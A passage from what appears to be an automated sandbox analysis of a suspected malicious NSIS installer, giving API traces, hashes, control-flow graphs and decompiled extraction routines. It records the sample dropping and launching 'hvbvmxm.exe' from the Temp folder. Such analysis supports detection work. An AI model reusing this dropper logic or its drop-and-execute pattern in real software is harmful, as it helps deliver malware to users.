                                                  0x00402df8
                                                  0x00000000
                                                  0x00402d16

                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 00402C9C
                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Lc8xQv8iZY.exe,00000400), ref: 00402CB8
                                                    • Part of subcall function 004059D2: GetFileAttributesA.KERNELBASE(00000003,00402CCB,C:\Users\user\Desktop\Lc8xQv8iZY.exe,80000000,00000003), ref: 004059D6
                                                    • Part of subcall function 004059D2: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059F8
                                                  • GetFileSize.KERNEL32(00000000,00000000,0042C000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Lc8xQv8iZY.exe,C:\Users\user\Desktop\Lc8xQv8iZY.exe,80000000,00000003), ref: 00402D01
                                                  • GlobalAlloc.KERNELBASE(00000040,?), ref: 00402E48
                                                  Strings
                                                  • C:\Users\user\Desktop, xrefs: 00402CE3, 00402CE8, 00402CEE
                                                  • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402EDF
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C95, 00402E60
                                                  • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402E91
                                                  • Null, xrefs: 00402D81
                                                  • C:\Users\user\Desktop\Lc8xQv8iZY.exe, xrefs: 00402CA2, 00402CB1, 00402CC5, 00402CE2
                                                  • "C:\Users\user\Desktop\Lc8xQv8iZY.exe", xrefs: 00402C88
                                                  • Inst, xrefs: 00402D6F
                                                  • Error launching installer, xrefs: 00402CD8
                                                  • soft, xrefs: 00402D78
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                  • String ID: "C:\Users\user\Desktop\Lc8xQv8iZY.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Lc8xQv8iZY.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                  • API String ID: 2803837635-3043249375
                                                  • Opcode ID: db2cc017f95917450d40f5227920ffc37e6356ca021c4e3099f4478149133015
                                                  • Instruction ID: 0e9652230e662f00d3bd1f21a88cc9cb10148a41a7cca4fb595923dc4d2ca5a0
                                                  • Opcode Fuzzy Hash: db2cc017f95917450d40f5227920ffc37e6356ca021c4e3099f4478149133015
                                                  • Instruction Fuzzy Hash: 2461C231A40205ABDB20DF64DE89B9E77B9EB04319F20417BF604B62D1D7BC9D818B9C
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00401734 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 147stringtimeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  C-Code - Quality: 75%
                                                  			E00401734(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				void* _t85;

				_t75 = __ebx;
				_t82 = E00402A0C(0x31);
				 *(_t85 - 0xc) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
				_t33 = E0040585B(_t82);
				_push(_t82);
				if(_t33 == 0) {
					lstrcatA(E004057EE(E00405CFB(0x409c50, "C:\\Users\\jones\\AppData\\Local\\Temp")), ??);
				} else {
					_push(0x409c50);
					E00405CFB();
				}
				E00405F5D(0x409c50);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E00405FF6(0x409c50);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E004059B3(0x409c50);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E004059D2(0x409c50, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 8) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E00404FE7(0xffffffe2,  *(_t85 - 0xc));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x424008 =  *0x424008 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x424008;
						goto L32;
					} else {
						E00405CFB(0x40a450, 0x425000);
						E00405CFB(0x425000, 0x409c50);
						E00405D1D(_t75, 0x40a450, 0x409c50, 0x40a050,  *((intOrPtr*)(_t85 - 0x14)));
						E00405CFB(0x425000, 0x40a450);
						_t62 = E004055BC(0x40a050,  *(_t85 - 0x28) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x424008 =  &( *0x424008->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(0x409c50);
								_push(0xfffffffa);
								E00404FE7();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00404FE7(0xffffffea,  *(_t85 - 0xc));
				 *0x424034 =  *0x424034 + 1;
				_t43 = E00402F2E(_t77,  *((intOrPtr*)(_t85 - 0x20)),  *(_t85 - 8), _t75, _t75); // executed
				 *0x424034 =  *0x424034 - 1;
				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x1c) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 8), _t85 - 0x1c, _t75, _t85 - 0x1c); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t85 - 8)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E00405D1D(_t75, _t80, 0x409c50, 0x409c50, 0xffffffee);
					} else {
						E00405D1D(_t75, _t80, 0x409c50, 0x409c50, 0xffffffe9);
						lstrcatA(0x409c50,  *(_t85 - 0xc));
					}
					_push(0x200010);
					_push(0x409c50);
					E004055BC();
					goto L29;
				}
				goto L33;
			}
















                                                  0x00401734
                                                  0x0040173b
                                                  0x00401744
                                                  0x00401747
                                                  0x0040174a
                                                  0x0040174f
                                                  0x00401757
                                                  0x00401773
                                                  0x00401759
                                                  0x00401759
                                                  0x0040175a
                                                  0x0040175a
                                                  0x00401779
                                                  0x00401783
                                                  0x00401783
                                                  0x00401787
                                                  0x0040178a
                                                  0x0040178f
                                                  0x00401791
                                                  0x00401793
                                                  0x00401798
                                                  0x00401798
                                                  0x004017a3
                                                  0x004017a3
                                                  0x004017b4
                                                  0x004017b6
                                                  0x004017b6
                                                  0x004017b7
                                                  0x004017b7
                                                  0x004017ba
                                                  0x004017bd
                                                  0x004017c0
                                                  0x004017c0
                                                  0x004017c7
                                                  0x004017d6
                                                  0x004017db
                                                  0x004017de
                                                  0x004017e1
                                                  0x00000000
                                                  0x00000000
                                                  0x004017e3
                                                  0x004017e6
                                                  0x00401840
                                                  0x00401845
                                                  0x004015a8
                                                  0x00402672
                                                  0x00402672
                                                  0x004028a1
                                                  0x004028a4
                                                  0x004028a4
                                                  0x00000000
                                                  0x004017e8
                                                  0x004017ee
                                                  0x004017f9
                                                  0x00401806
                                                  0x00401811
                                                  0x00401827
                                                  0x00401827
                                                  0x0040182a
                                                  0x00000000
                                                  0x00401830
                                                  0x00401830
                                                  0x00401831
                                                  0x0040184e
                                                  0x004028aa
                                                  0x004028aa
                                                  0x004028aa
                                                  0x00401833
                                                  0x00401833
                                                  0x00401834
                                                  0x00401492
                                                  0x00402224
                                                  0x00402224
                                                  0x00402224
                                                  0x00401831
                                                  0x0040182a
                                                  0x004028ac
                                                  0x004028b0
                                                  0x004028b0
                                                  0x0040185e
                                                  0x00401863
                                                  0x00401871
                                                  0x00401876
                                                  0x0040187c
                                                  0x00401880
                                                  0x00401882
                                                  0x0040188a
                                                  0x00401896
                                                  0x00401884
                                                  0x00401884
                                                  0x00401888
                                                  0x00000000
                                                  0x00000000
                                                  0x00401888
                                                  0x0040189f
                                                  0x004018a5
                                                  0x004018a7
                                                  0x00000000
                                                  0x004018ad
                                                  0x004018ad
                                                  0x004018b0
                                                  0x004018c8
                                                  0x004018b2
                                                  0x004018b5
                                                  0x004018be
                                                  0x004018be
                                                  0x004018cd
                                                  0x004018d2
                                                  0x0040221f
                                                  0x00000000
                                                  0x0040221f
                                                  0x00000000

                                                  APIs
                                                  • lstrcatA.KERNEL32(00000000,00000000,"C:\Users\user\AppData\Local\Temp\hvbvmxm.exe" C:\Users\user\AppData\Local\Temp\ijamguwvje.h,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401773
                                                  • CompareFileTime.KERNEL32(-00000014,?,"C:\Users\user\AppData\Local\Temp\hvbvmxm.exe" C:\Users\user\AppData\Local\Temp\ijamguwvje.h,"C:\Users\user\AppData\Local\Temp\hvbvmxm.exe" C:\Users\user\AppData\Local\Temp\ijamguwvje.h,00000000,00000000,"C:\Users\user\AppData\Local\Temp\hvbvmxm.exe" C:\Users\user\AppData\Local\Temp\ijamguwvje.h,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 0040179D
                                                    • Part of subcall function 00405CFB: lstrcpynA.KERNEL32(?,?,00000400,004032FF,00423780,NSIS Error), ref: 00405D08
                                                    • Part of subcall function 00404FE7: lstrlenA.KERNEL32(0041FD58,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C60,00000000,?), ref: 00405020
                                                    • Part of subcall function 00404FE7: lstrlenA.KERNEL32(00402C60,0041FD58,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C60,00000000), ref: 00405030
                                                    • Part of subcall function 00404FE7: lstrcatA.KERNEL32(0041FD58,00402C60,00402C60,0041FD58,00000000,00000000,00000000), ref: 00405043
                                                    • Part of subcall function 00404FE7: SetWindowTextA.USER32(0041FD58,0041FD58), ref: 00405055
                                                    • Part of subcall function 00404FE7: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040507B
                                                    • Part of subcall function 00404FE7: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405095
                                                    • Part of subcall function 00404FE7: SendMessageA.USER32(?,00001013,?,00000000), ref: 004050A3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                  • String ID: "C:\Users\user\AppData\Local\Temp\hvbvmxm.exe" C:\Users\user\AppData\Local\Temp\ijamguwvje.h$C:\Users\user\AppData\Local\Temp
                                                  • API String ID: 1941528284-1310186067
                                                  • Opcode ID: a0738bd6af5fe49f804141574639d4b3e913ec42b508a49906380faa70039aab
                                                  • Instruction ID: 259d77b7a90db29c7fa011e8bbfdec82aa2f97c3204575e8132969168071ea88
                                                  • Opcode Fuzzy Hash: a0738bd6af5fe49f804141574639d4b3e913ec42b508a49906380faa70039aab
                                                  • Instruction Fuzzy Hash: E041C332904519BADF107BA5CD45EAF3669EF41328B20823BF522F11E1D73C4A419F6D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00402F2E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 109fileCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 415 402f2e-402f3d 416 402f5b-402f66 call 403059 415->416 417 402f3f-402f55 SetFilePointer 415->417 420 403052-403056 416->420 421 402f6c-402f86 ReadFile 416->421 417->416 422 402f8c-402f8f 421->422 423 40304f 421->423 422->423 424 402f95-402fa8 call 403059 422->424 425 403051 423->425 424->420 428 402fae-402fb1 424->428 425->420 429 402fb3-402fb6 428->429 430 40301e-403024 428->430 433 40304a-40304d 429->433 434 402fbc 429->434 431 403026 430->431 432 403029-40303c ReadFile 430->432 431->432 432->423 435 40303e-403047 432->435 433->420 436 402fc1-402fc9 434->436 435->433 437 402fcb 436->437 438 402fce-402fe0 ReadFile 436->438 437->438 438->423 439 402fe2-402fe5 438->439 439->423 440 402fe7-402ffc WriteFile 439->440 441 40301a-40301c 440->441 442 402ffe-403001 440->442 441->425 442->441 443 403003-403016 442->443 443->436 444 403018 443->444 444->433
                                                  C-Code - Quality: 93%
                                                  			E00402F2E(void* __ecx, void _a4, void* _a8, void* _a12, long _a16) {
				long _v8;
				intOrPtr _v12;
				void _t31;
				intOrPtr _t32;
				int _t35;
				long _t36;
				int _t37;
				long _t38;
				int _t40;
				int _t42;
				long _t43;
				long _t44;
				long _t55;
				long _t57;

				_t31 = _a4;
				if(_t31 >= 0) {
					_t44 = _t31 +  *0x423fd8;
					 *0x417124 = _t44;
					SetFilePointer( *0x409018, _t44, 0, 0); // executed
				}
				_t57 = 4;
				_t32 = E00403059(_t57);
				if(_t32 >= 0) {
					_t35 = ReadFile( *0x409018,  &_a4, _t57,  &_v8, 0); // executed
					if(_t35 == 0 || _v8 != _t57) {
						L23:
						_push(0xfffffffd);
						goto L24;
					} else {
						 *0x417124 =  *0x417124 + _t57;
						_t32 = E00403059(_a4);
						_v12 = _t32;
						if(_t32 >= 0) {
							if(_a12 != 0) {
								_t36 = _a4;
								if(_t36 >= _a16) {
									_t36 = _a16;
								}
								_t37 = ReadFile( *0x409018, _a12, _t36,  &_v8, 0); // executed
								if(_t37 == 0) {
									goto L23;
								} else {
									_t38 = _v8;
									 *0x417124 =  *0x417124 + _t38;
									_v12 = _t38;
									goto L22;
								}
							} else {
								if(_a4 <= 0) {
									L22:
									_t32 = _v12;
								} else {
									while(1) {
										_t55 = 0x4000;
										if(_a4 < 0x4000) {
											_t55 = _a4;
										}
										_t40 = ReadFile( *0x409018, 0x413120, _t55,  &_v8, 0); // executed
										if(_t40 == 0 || _t55 != _v8) {
											goto L23;
										}
										_t42 = WriteFile(_a8, 0x413120, _v8,  &_a16, 0); // executed
										if(_t42 == 0 || _a16 != _t55) {
											_push(0xfffffffe);
											L24:
											_pop(_t32);
										} else {
											_t43 = _v8;
											_v12 = _v12 + _t43;
											_a4 = _a4 - _t43;
											 *0x417124 =  *0x417124 + _t43;
											if(_a4 > 0) {
												continue;
											} else {
												goto L22;
											}
										}
										goto L25;
									}
									goto L23;
								}
							}
						}
					}
				}
				L25:
				return _t32;
			}

















                                                  0x00402f33
                                                  0x00402f3d
                                                  0x00402f46
                                                  0x00402f4a
                                                  0x00402f55
                                                  0x00402f55
                                                  0x00402f5d
                                                  0x00402f5f
                                                  0x00402f66
                                                  0x00402f82
                                                  0x00402f86
                                                  0x0040304f
                                                  0x0040304f
                                                  0x00000000
                                                  0x00402f95
                                                  0x00402f98
                                                  0x00402f9e
                                                  0x00402fa5
                                                  0x00402fa8
                                                  0x00402fb1
                                                  0x0040301e
                                                  0x00403024
                                                  0x00403026
                                                  0x00403026
                                                  0x00403038
                                                  0x0040303c
                                                  0x00000000
                                                  0x0040303e
                                                  0x0040303e
                                                  0x00403041
                                                  0x00403047
                                                  0x00000000
                                                  0x00403047
                                                  0x00402fb3
                                                  0x00402fb6
                                                  0x0040304a
                                                  0x0040304a
                                                  0x00402fbc
                                                  0x00402fc1
                                                  0x00402fc1
                                                  0x00402fc9
                                                  0x00402fcb
                                                  0x00402fcb
                                                  0x00402fdc
                                                  0x00402fe0
                                                  0x00000000
                                                  0x00000000
                                                  0x00402ff4
                                                  0x00402ffc
                                                  0x0040301a
                                                  0x00403051
                                                  0x00403051
                                                  0x00403003
                                                  0x00403003
                                                  0x00403006
                                                  0x00403009
                                                  0x0040300c
                                                  0x00403016
                                                  0x00000000
                                                  0x00403018
                                                  0x00000000
                                                  0x00403018
                                                  0x00403016
                                                  0x00000000
                                                  0x00402ffc
                                                  0x00000000
                                                  0x00402fc1
                                                  0x00402fb6
                                                  0x00402fb1
                                                  0x00402fa8
                                                  0x00402f86
                                                  0x00403052
                                                  0x00403056

                                                  APIs
                                                  • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,?,?,?,00402EDA,000000FF,00000000,00000000,?,?), ref: 00402F55
                                                  • ReadFile.KERNELBASE(?,00000004,?,00000000,00000004,00000000,00000000,00000000,?,?,?,00402EDA,000000FF,00000000,00000000,?), ref: 00402F82
                                                  • ReadFile.KERNELBASE(00413120,00004000,?,00000000,?,?,00402EDA,000000FF,00000000,00000000,?,?), ref: 00402FDC
                                                  • WriteFile.KERNELBASE(00000000,00413120,?,000000FF,00000000,?,00402EDA,000000FF,00000000,00000000,?,?), ref: 00402FF4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: File$Read$PointerWrite
                                                  • String ID: 1A
                                                  • API String ID: 2113905535-9103686
                                                  • Opcode ID: dfd426ff9148373ae1b38b35403f472367688ea5597ee74420ff68edd34f8a5f
                                                  • Instruction ID: 82d5fff184c734a1787b3ae727349c02325da9e894cdbedb842e9025a389ee8f
                                                  • Opcode Fuzzy Hash: dfd426ff9148373ae1b38b35403f472367688ea5597ee74420ff68edd34f8a5f
                                                  • Instruction Fuzzy Hash: 9A313871501209FBCF21DF55DD44AAF3BB8EB44765F20403AF904A6291D3389F91DBA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00403059 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 108fileCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 445 403059-403082 GetTickCount 446 4031c3-4031cb call 402be9 445->446 447 403088-4030b3 call 403207 SetFilePointer 445->447 452 4031cd-4031d2 446->452 453 4030b8-4030ca 447->453 454 4030cc 453->454 455 4030ce-4030dc call 4031d5 453->455 454->455 458 4030e2-4030ee 455->458 459 4031b5-4031b8 455->459 460 4030f4-4030fa 458->460 459->452 461 403125-403141 call 406184 460->461 462 4030fc-403102 460->462 468 403143-40314b 461->468 469 4031be 461->469 462->461 463 403104-403124 call 402be9 462->463 463->461 471 40314d-403163 WriteFile 468->471 472 40317f-403185 468->472 470 4031c0-4031c1 469->470 470->452 473 403165-403169 471->473 474 4031ba-4031bc 471->474 472->469 475 403187-403189 472->475 473->474 476 40316b-403177 473->476 474->470 475->469 477 40318b-40319e 475->477 476->460 478 40317d 476->478 477->453 479 4031a4-4031b3 SetFilePointer 477->479 478->477 479->446
                                                  C-Code - Quality: 94%
                                                  			E00403059(intOrPtr _a4) {
				long _v4;
				void* __ecx;
				intOrPtr _t12;
				intOrPtr _t13;
				signed int _t14;
				void* _t16;
				void* _t17;
				long _t18;
				int _t21;
				intOrPtr _t34;
				long _t35;
				intOrPtr _t37;
				void* _t39;
				long _t40;
				intOrPtr _t53;

				_t35 =  *0x417124; // 0x505a9
				_t37 = _t35 -  *0x40b090 + _a4;
				 *0x423f8c = GetTickCount() + 0x1f4;
				if(_t37 <= 0) {
					L23:
					E00402BE9(1);
					return 0;
				}
				E00403207( *0x41f134);
				SetFilePointer( *0x409018,  *0x40b090, 0, 0); // executed
				 *0x41f130 = _t37;
				 *0x417120 = 0;
				while(1) {
					_t12 =  *0x417128; // 0x44117
					_t34 = 0x4000;
					_t13 = _t12 -  *0x41f134;
					if(_t13 <= 0x4000) {
						_t34 = _t13;
					}
					_t14 = E004031D5(0x413120, _t34); // executed
					if(_t14 == 0) {
						break;
					}
					 *0x41f134 =  *0x41f134 + _t34;
					 *0x40b0b0 = 0x413120;
					 *0x40b0b4 = _t34;
					L6:
					L6:
					if( *0x423f90 != 0 &&  *0x424020 == 0) {
						 *0x417120 =  *0x41f130 -  *0x417124 - _a4 +  *0x40b090;
						E00402BE9(0);
					}
					 *0x40b0b8 = 0x40b120;
					 *0x40b0bc = 0x8000; // executed
					_t16 = E00406184(0x40b098); // executed
					if(_t16 < 0) {
						goto L21;
					}
					_t39 =  *0x40b0b8; // 0x40dbb3
					_t40 = _t39 - 0x40b120;
					if(_t40 == 0) {
						__eflags =  *0x40b0b4; // 0x0
						if(__eflags != 0) {
							goto L21;
						}
						__eflags = _t34;
						if(_t34 == 0) {
							goto L21;
						}
						L17:
						_t18 =  *0x417124; // 0x505a9
						if(_t18 -  *0x40b090 + _a4 > 0) {
							continue;
						}
						SetFilePointer( *0x409018, _t18, 0, 0); // executed
						goto L23;
					}
					_t21 = WriteFile( *0x409018, 0x40b120, _t40,  &_v4, 0); // executed
					if(_t21 == 0 || _t40 != _v4) {
						_push(0xfffffffe);
						L22:
						_pop(_t17);
						return _t17;
					} else {
						 *0x40b090 =  *0x40b090 + _t40;
						_t53 =  *0x40b0b4; // 0x0
						if(_t53 != 0) {
							goto L6;
						}
						goto L17;
					}
					L21:
					_push(0xfffffffd);
					goto L22;
				}
				return _t14 | 0xffffffff;
			}


















                                                  0x0040305d
                                                  0x0040306a
                                                  0x0040307d
                                                  0x00403082
                                                  0x004031c3
                                                  0x004031c5
                                                  0x00000000
                                                  0x004031cb
                                                  0x0040308e
                                                  0x004030a1
                                                  0x004030a7
                                                  0x004030ad
                                                  0x004030b8
                                                  0x004030b8
                                                  0x004030bd
                                                  0x004030c2
                                                  0x004030ca
                                                  0x004030cc
                                                  0x004030cc
                                                  0x004030d5
                                                  0x004030dc
                                                  0x00000000
                                                  0x00000000
                                                  0x004030e2
                                                  0x004030e8
                                                  0x004030ee
                                                  0x00000000
                                                  0x004030f4
                                                  0x004030fa
                                                  0x0040311a
                                                  0x0040311f
                                                  0x00403124
                                                  0x0040312a
                                                  0x00403130
                                                  0x0040313a
                                                  0x00403141
                                                  0x00000000
                                                  0x00000000
                                                  0x00403143
                                                  0x00403149
                                                  0x0040314b
                                                  0x0040317f
                                                  0x00403185
                                                  0x00000000
                                                  0x00000000
                                                  0x00403187
                                                  0x00403189
                                                  0x00000000
                                                  0x00000000
                                                  0x0040318b
                                                  0x0040318b
                                                  0x0040319e
                                                  0x00000000
                                                  0x00000000
                                                  0x004031ad
                                                  0x00000000
                                                  0x004031ad
                                                  0x0040315b
                                                  0x00403163
                                                  0x004031ba
                                                  0x004031c0
                                                  0x004031c0
                                                  0x00000000
                                                  0x0040316b
                                                  0x0040316b
                                                  0x00403171
                                                  0x00403177
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040317d
                                                  0x004031be
                                                  0x004031be
                                                  0x00000000
                                                  0x004031be
                                                  0x00000000

                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 0040306E
                                                    • Part of subcall function 00403207: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EB3,?), ref: 00403215
                                                  • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00402F64,00000004,00000000,00000000,00000000,?,?,?,00402EDA,000000FF,00000000), ref: 004030A1
                                                  • WriteFile.KERNELBASE(0040B120,0040DBB3,00000000,00000000,00413120,00004000,?,00000000,?,00402F64,00000004,00000000,00000000,00000000,?,?), ref: 0040315B
                                                  • SetFilePointer.KERNELBASE(000505A9,00000000,00000000,00413120,00004000,?,00000000,?,00402F64,00000004,00000000,00000000,00000000,?,?), ref: 004031AD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: File$Pointer$CountTickWrite
                                                  • String ID: 1A
                                                  • API String ID: 2146148272-9103686
                                                  • Opcode ID: 0cf6868b9e9647ca11da496d61e231f9210f9a3003146b68b5f630b0a2b16ff6
                                                  • Instruction ID: 4dd4975a9f59093c3e0d8581b597c69eeb1c8b76cfa1fe2ad7fe21498de3e5f3
                                                  • Opcode Fuzzy Hash: 0cf6868b9e9647ca11da496d61e231f9210f9a3003146b68b5f630b0a2b16ff6
                                                  • Instruction Fuzzy Hash: 16418D72518201AFC7109F29EE849673BBDF708356714423BEA60B62E0D7386D098B9D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004015B3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 480 4015b3-4015c6 call 402a0c call 405882 485 4015c8-4015e3 call 405819 CreateDirectoryA 480->485 486 40160a-40160d 480->486 493 401600-401608 485->493 494 4015e5-4015f0 GetLastError 485->494 488 40162d-40217f call 401423 486->488 489 40160f-401628 call 401423 call 405cfb SetCurrentDirectoryA 486->489 501 4028a1-4028b0 488->501 489->501 493->485 493->486 497 4015f2-4015fb GetFileAttributesA 494->497 498 4015fd 494->498 497->493 497->498 498->493
                                                  C-Code - Quality: 85%
                                                  			E004015B3(struct _SECURITY_ATTRIBUTES* __ebx) {
				struct _SECURITY_ATTRIBUTES** _t10;
				int _t19;
				struct _SECURITY_ATTRIBUTES* _t20;
				signed char _t22;
				struct _SECURITY_ATTRIBUTES* _t23;
				CHAR* _t25;
				struct _SECURITY_ATTRIBUTES** _t29;
				void* _t30;

				_t23 = __ebx;
